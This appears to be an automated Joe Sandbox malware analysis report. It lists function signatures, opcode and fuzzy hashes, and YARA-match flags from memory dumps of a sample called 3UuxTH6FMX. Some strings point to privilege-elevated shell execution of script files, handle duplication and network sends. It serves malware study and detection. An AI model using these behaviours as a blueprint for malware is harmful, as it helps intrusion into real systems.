                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3947729631-0
                                                                                                                                                                  • Opcode ID: 530d5f225501611c07fa3f753d7d8dc80cca454b0254b6cc05cb90d306267795
                                                                                                                                                                  • Instruction ID: 1f3552b447de9af71b66a7b178e3a857af7096d5a65fb3cac42adc2594fb7e6b
                                                                                                                                                                  • Opcode Fuzzy Hash: 530d5f225501611c07fa3f753d7d8dc80cca454b0254b6cc05cb90d306267795
                                                                                                                                                                  • Instruction Fuzzy Hash: 92216032A057408AEB24AFA8D4883EC37A0F75471CF584626D799C7AD6EF34CA95CB40
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 6080b6f5c7735027f4532a4154f17099be5a1c2b37b88469d38b788aa2f2ab04
                                                                                                                                                                  • Instruction ID: b76b4c68643967a0db24fdcbd0037b2d9483afee6555540bdf01d1ffaa8a703e
                                                                                                                                                                  • Opcode Fuzzy Hash: 6080b6f5c7735027f4532a4154f17099be5a1c2b37b88469d38b788aa2f2ab04
                                                                                                                                                                  • Instruction Fuzzy Hash: 3B11A83160C650C1EA60DFA1D4943FDA364FBA5B8CF444522EA84D77A7CF7DCA824B41
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: c41a516aab5bbd5a0cb5ee3d8915c07e5e449c965519035ee3790c186b832703
                                                                                                                                                                  • Instruction ID: 48668b81f3010f8506ef0d201c33254b17c990c4df2f38c735a744c29a3ae6c7
                                                                                                                                                                  • Opcode Fuzzy Hash: c41a516aab5bbd5a0cb5ee3d8915c07e5e449c965519035ee3790c186b832703
                                                                                                                                                                  • Instruction Fuzzy Hash: F521963221CA4187E7659F28D4943ED77A1EBA4B58F144224E759C76E9DF39CA41CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: send
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2809346765-0
                                                                                                                                                                  • Opcode ID: af342f55a76444dc29af71e8fb4152a83f454f5b800a0383b076c9e997804f61
                                                                                                                                                                  • Instruction ID: 4561201c095bc01ab863edf4aa402dbf0914e70cd3f5bbb866d2b8c59dc234b5
                                                                                                                                                                  • Opcode Fuzzy Hash: af342f55a76444dc29af71e8fb4152a83f454f5b800a0383b076c9e997804f61
                                                                                                                                                                  • Instruction Fuzzy Hash: 3A01D631719A8481EB509F1AF98425EA7A0F798FD8F585130EF5D83F49DF28C9958740
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFindNext
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2029273394-0
                                                                                                                                                                  • Opcode ID: c09ff1b7f36846cd2f70e20038cef65db65028f9499b4e4cc306786389cb5efe
                                                                                                                                                                  • Instruction ID: 76f0ea829e52ddd1c85e5e0432b02cf5dd547183d20adb7ec23ad50aceb484c5
                                                                                                                                                                  • Opcode Fuzzy Hash: c09ff1b7f36846cd2f70e20038cef65db65028f9499b4e4cc306786389cb5efe
                                                                                                                                                                  • Instruction Fuzzy Hash: E001F43621CA8085EA71DF52F4987DEA364F7D9B94F805012DE9D93B59DE38C986CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: 8baf8acf487f5caa78a15ef12004ef049afcc069522c3c2ef46e844b516c0117
                                                                                                                                                                  • Instruction ID: 3e258139591118a06fcbf2b665d6508c38eadfed7ce0d428b8bc11e3d46c8ee1
                                                                                                                                                                  • Opcode Fuzzy Hash: 8baf8acf487f5caa78a15ef12004ef049afcc069522c3c2ef46e844b516c0117
                                                                                                                                                                  • Instruction Fuzzy Hash: 7CE0683531D64182EF342BB4E1C93EC73609B207B8F144721A734833C6CF348D508602
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFindNext
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2029273394-0
                                                                                                                                                                  • Opcode ID: 4177796e15072c585db232ab642f29accb6d05ea1f689265af403d42f2bb1474
                                                                                                                                                                  • Instruction ID: 9abaaf6aa199693ec46fe3d425770d4359d86cc945d5942480ed5d357c5c8926
                                                                                                                                                                  • Opcode Fuzzy Hash: 4177796e15072c585db232ab642f29accb6d05ea1f689265af403d42f2bb1474
                                                                                                                                                                  • Instruction Fuzzy Hash: 59C04C25F19515C1F6541F765CDA7DE1290B768748F404020C604C0650DD2C87D74611
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoNativeSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1721193555-0
                                                                                                                                                                  • Opcode ID: 5d96549d17151685d9874b2efd5e6665c09aeaad6767ec6861ada1b691878f94
                                                                                                                                                                  • Instruction ID: 6f4dd0105a6107e248fb84d53b220ef4aa14026c762606275316afe2981ff614
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d96549d17151685d9874b2efd5e6665c09aeaad6767ec6861ada1b691878f94
                                                                                                                                                                  • Instruction Fuzzy Hash: 72B09236A188C0C3D611EF04E89608D7331F7A4B0CFD00000E28D82A24CE2CDA2A8E04
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                  • Opcode ID: 735fdacdf537e6d17f030f13e349f9107f2389d02998886e9996cc406814ac26
                                                                                                                                                                  • Instruction ID: f7789df0869916f13b8091958bec8f1130fabf04935611623d6e8207a30d6b2c
                                                                                                                                                                  • Opcode Fuzzy Hash: 735fdacdf537e6d17f030f13e349f9107f2389d02998886e9996cc406814ac26
                                                                                                                                                                  • Instruction Fuzzy Hash: 59F06D7430D24581FF585B6298E93ED2390AB64B58F0C98314A2AC67C2DE2CCE818610
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                  • Opcode ID: ad1b43cdb7c3550550fd4afa13c905d117ea5c1f34bfd66f5f885cc22fb7391c
                                                                                                                                                                  • Instruction ID: 2e6ed25d770d8d564dd1d20f27b207cf3f9c85ffead3b100a79a51ca3bf269c5
                                                                                                                                                                  • Opcode Fuzzy Hash: ad1b43cdb7c3550550fd4afa13c905d117ea5c1f34bfd66f5f885cc22fb7391c
                                                                                                                                                                  • Instruction Fuzzy Hash: 04F08C3071D24585FF549BB158DC3ED23905B687B8F085A205D7AC62C2DEACCE808950
                                                                                                                                                                  APIs
                                                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,00007FF7AA12C651,?,?,00000000,00007FF7AA12BF97,?,?,?,00007FF7AA12A29F,?,?,?,00007FF7AA12A195), ref: 00007FF7AA122B86
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4292702814-0
                                                                                                                                                                  • Opcode ID: 5c270841806ca0d65908707fc072f6ad565d7e89aec5f4c22d169a1f53078808
                                                                                                                                                                  • Instruction ID: 62f9c1b6520d001bdef07d020bf54bfb21dd944f7d6210ecd764dd5d416d88ad
                                                                                                                                                                  • Opcode Fuzzy Hash: 5c270841806ca0d65908707fc072f6ad565d7e89aec5f4c22d169a1f53078808
                                                                                                                                                                  • Instruction Fuzzy Hash: 34F05401F0F206E5FE567B61F94177992604F44760F8A47B4DD2D4A2E1DD6CE44A4730
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: lstrcpy$lstrcat$AllocateInitLockMemoryObjectStringUnicodeVirtual$AcquireEnumerateFolderFreeInitializeKnownLoadedModulesPathReleaseTaskUninitialize
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 1424456515-4108050209
                                                                                                                                                                  • Opcode ID: 6ffb8313ed9f69c499e31eddb7b03b728e50a55c1d765e9ed0a63387d906397a
                                                                                                                                                                  • Instruction ID: 1e80c9c733e10fc0e4f7312277770ecda18a93acb0f5778a7294b3f590675658
                                                                                                                                                                  • Opcode Fuzzy Hash: 6ffb8313ed9f69c499e31eddb7b03b728e50a55c1d765e9ed0a63387d906397a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9AC2A83662AF948AD7908F69E88169DB3B5F788B88F105219EECD57F18EF38C154C740
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Handle$Query$CloseInformationProcessSystem$AddressCurrentFinalModuleNameObjectOpenPathProc
                                                                                                                                                                  • String ID: File$NtDuplicateObject$ntdll.dll
                                                                                                                                                                  • API String ID: 2729825427-3955674919
                                                                                                                                                                  • Opcode ID: aeaabd781365e64ea288e3f4743e5fff97b0c8a80adc1127304e7ba6f14734e0
                                                                                                                                                                  • Instruction ID: c5051c6e2893b8ddc2a452fb1583148b264e3b2cdef07ce20fdfcca3c4dc8710
                                                                                                                                                                  • Opcode Fuzzy Hash: aeaabd781365e64ea288e3f4743e5fff97b0c8a80adc1127304e7ba6f14734e0
                                                                                                                                                                  • Instruction Fuzzy Hash: 1AE1E476718A84CAFB14DF65D4A83EC27A1E764B8CF408121DE5D97B99DF38CA89C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 2538663250-2766056989
                                                                                                                                                                  • Opcode ID: 426d5b210e34d6644ca4b902c622b4a36b26bf826e5e2e516d273282e195be65
                                                                                                                                                                  • Instruction ID: 2f160a3fb610c82292f9968c44a6ec48841876edccc33b666dca0f0cd937a7e7
                                                                                                                                                                  • Opcode Fuzzy Hash: 426d5b210e34d6644ca4b902c622b4a36b26bf826e5e2e516d273282e195be65
                                                                                                                                                                  • Instruction Fuzzy Hash: DEA17A72B08A508AF710CF79E4983DD77A1F798B8CF004625DE5A97A99DF38C694C344
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExecuteShell
                                                                                                                                                                  • String ID: .cmd$.exe$.exe$.ps1$.vbs$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+=-&^%$#@!(){}[},.;'$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$open$runas
                                                                                                                                                                  • API String ID: 587946157-4093014531
                                                                                                                                                                  • Opcode ID: 6509813669dfaeaa064a6cbbc8ef33ce02ea974a5e13a0021224223f6e439dbe
                                                                                                                                                                  • Instruction ID: 7ec009ebdca52fb650529e78570579e530320d259ffed2da599963d9a223b19a
                                                                                                                                                                  • Opcode Fuzzy Hash: 6509813669dfaeaa064a6cbbc8ef33ce02ea974a5e13a0021224223f6e439dbe
                                                                                                                                                                  • Instruction Fuzzy Hash: 9522D473A18B8489EB10DF34E8883DE37A1F79479CF505216EA5D87AA9DF74C684C740
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                  • API String ID: 3069159798-905460609
                                                                                                                                                                  • Opcode ID: 4309449c26b629e9b6de698707476955217e9cbe9722d2e68f3c85218e94a805
                                                                                                                                                                  • Instruction ID: e2b3ed36f6d7f233b0fe125d1f2ccc88b59bec112c5bce29c8a93341fdcc2b95
                                                                                                                                                                  • Opcode Fuzzy Hash: 4309449c26b629e9b6de698707476955217e9cbe9722d2e68f3c85218e94a805
                                                                                                                                                                  • Instruction Fuzzy Hash: C091CD3220874086FB24AF21D8997ED23A5FBA4B88F548125DE98C7B85DF38CF55C741
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2591520935-0
                                                                                                                                                                  • Opcode ID: 5eb0d27aa7dc3a9912447742f13a9ce850b1caaedf69b48f01ffc0c9247ee539
                                                                                                                                                                  • Instruction ID: ed521de4137bea347fe94656986a246838250e687acb906bea11cde5aa5c0d9e
                                                                                                                                                                  • Opcode Fuzzy Hash: 5eb0d27aa7dc3a9912447742f13a9ce850b1caaedf69b48f01ffc0c9247ee539
                                                                                                                                                                  • Instruction Fuzzy Hash: E1719B327186108AFB149F60D8A87EC33A4FB69B4CFA444A58E9993795EF38CF45C310
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_exception_destroy
                                                                                                                                                                  • String ID: value
                                                                                                                                                                  • API String ID: 2453523683-494360628
                                                                                                                                                                  • Opcode ID: bf267fe5af5e895c7c4d6d8ecbf4798ffec0ed1ec636fa69b13456a1e4242072
                                                                                                                                                                  • Instruction ID: c9dfaf687681cc7ad4bcd44a0ef04472868dc13683a01f3f6d568fc289ae9ce1
                                                                                                                                                                  • Opcode Fuzzy Hash: bf267fe5af5e895c7c4d6d8ecbf4798ffec0ed1ec636fa69b13456a1e4242072
                                                                                                                                                                  • Instruction Fuzzy Hash: 4E029032618BC085EB11CF74E4983ED6761F7A57A8F505216FA9D83ADADF78CA85C300
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                  • Opcode ID: c7f70f128318b326f672a7b0d6647dc5eb587961ea58d1b4d09a7c2ba848fd84
                                                                                                                                                                  • Instruction ID: 6373e12be5f19a785c3f6dea4fd12199138fdb0d52e385cf15f2c008d12fa855
                                                                                                                                                                  • Opcode Fuzzy Hash: c7f70f128318b326f672a7b0d6647dc5eb587961ea58d1b4d09a7c2ba848fd84
                                                                                                                                                                  • Instruction Fuzzy Hash: 0C316036218B8086EB60CF25E8943DE77A4F798758F500116EA9D83BA9DF38C685CB00
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193923982.00007FF7AA101000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF7AA100000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2193868965.00007FF7AA100000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA138000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2193964607.00007FF7AA376000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194109603.00007FF7AA380000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2194152325.00007FF7AA383000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7aa100000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                  • Opcode ID: 3ef0962f47fead2417061adc38ad2713cf90374c45b282237d95016c72f16019
                                                                                                                                                                  • Instruction ID: 0b9c09dd4839ad58900178bb3e932b716a3c8c27b5b52c6b1a5d038538b6f5b5
                                                                                                                                                                  • Opcode Fuzzy Hash: 3ef0962f47fead2417061adc38ad2713cf90374c45b282237d95016c72f16019
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C31A336A05B81D6E7659F24E8402AEB3B0FB88758F910136EA8D43B65EF3CD54A8710
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00000218BFC0BB97
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                  • API String ID: 389471666-631824599
                                                                                                                                                                  • Opcode ID: e8ffe009acab376759065dd43441e42d099b308a5e20a56206d0bc25ee25ae09
                                                                                                                                                                  • Instruction ID: 4eb15c1f01a0c2dc99882d9b145a1088e5db6197554134b8db5113ab1b0297e5
                                                                                                                                                                  • Opcode Fuzzy Hash: e8ffe009acab376759065dd43441e42d099b308a5e20a56206d0bc25ee25ae09
                                                                                                                                                                  • Instruction Fuzzy Hash: 05115A32618B60A7F7049B26EAE83ED33A5FB64749F404125C649C3A65EF38D6F8C710
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual$AllocInfoProtectQuerySystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3562403962-0
                                                                                                                                                                  • Opcode ID: 324fd5cd604fef47d1152131e1f7c01459585a6c12e9a2e3e67a5e0172bc20d3
                                                                                                                                                                  • Instruction ID: c9fed4f65e1a3c71083c0521b171fd9555774f574aa815ced33e3fdf56e0eee6
                                                                                                                                                                  • Opcode Fuzzy Hash: 324fd5cd604fef47d1152131e1f7c01459585a6c12e9a2e3e67a5e0172bc20d3
                                                                                                                                                                  • Instruction Fuzzy Hash: 03314932314A949EEB20CF31D8987DD23A5F758B8CF944426EA5D87B58DF38DA4AC700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                  • Opcode ID: f06392d29159ea5021ae0933302a5494cfde722d0989828b5d6bd782ea4d1856
                                                                                                                                                                  • Instruction ID: 75ac7a2525ff0d963e8e428e5c4d388bfb591f51342b580af2cac69c1cdb997a
                                                                                                                                                                  • Opcode Fuzzy Hash: f06392d29159ea5021ae0933302a5494cfde722d0989828b5d6bd782ea4d1856
                                                                                                                                                                  • Instruction Fuzzy Hash: D311FA36715F108AFB00DF60E8A93EC33A4F769758F441E25EA6D86BA4DF78C2958340
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_218bfb50000_3UuxTH6FMX.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __std_exception_copy
                                                                                                                                                                  • String ID: parse_error$value
                                                                                                                                                                  • API String ID: 592178966-1739288027
                                                                                                                                                                  • Opcode ID: dd6b2b3d65c090a64a4caee53a00a4ef71476eaf1cd991c4dbe8aa48bce2a379
                                                                                                                                                                  • Instruction ID: b19ed54f32bc8c9604dc337cbc888a224ec47fa28e0c97deae44d00c2489f695
                                                                                                                                                                  • Opcode Fuzzy Hash: dd6b2b3d65c090a64a4caee53a00a4ef71476eaf1cd991c4dbe8aa48bce2a379
                                                                                                                                                                  • Instruction Fuzzy Hash: B5F1E572B18A8095EB10DF74E8993DD2362F7A539CF905212EA4C97ADADF74CB85C340
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2193045503.00000218BFB50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000218BFB50000, based on PE: true
